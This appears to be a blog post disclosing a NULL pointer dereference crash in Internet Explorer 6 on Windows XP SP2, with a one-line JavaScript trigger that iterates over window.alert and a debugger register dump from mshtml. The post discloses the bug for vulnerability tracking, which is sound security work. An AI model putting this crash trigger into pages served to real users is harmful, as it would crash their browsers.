The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. A NULL reference can be triggered by using javascript to iterate over a native function.
for (var i in window.alert) { var a = 1; }
Demonstration
eax=00000000 ebx=ffffffff ecx=0013b3f0
edx=0013b3f0 esi=00000000 edi=0013b488
eip=7dceef12 esp=0013b3d0 ebp=0013b3d4
mshtml!CPtrBagVTableAggregate::CIterator::Start+0x1e:
7dceef12 ff36 push dword ptr [esi] ds:0023:00000000=?????
This bug will be added to the OSVDB:
Microsoft IE Native Function Iteration NULL Dereference
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment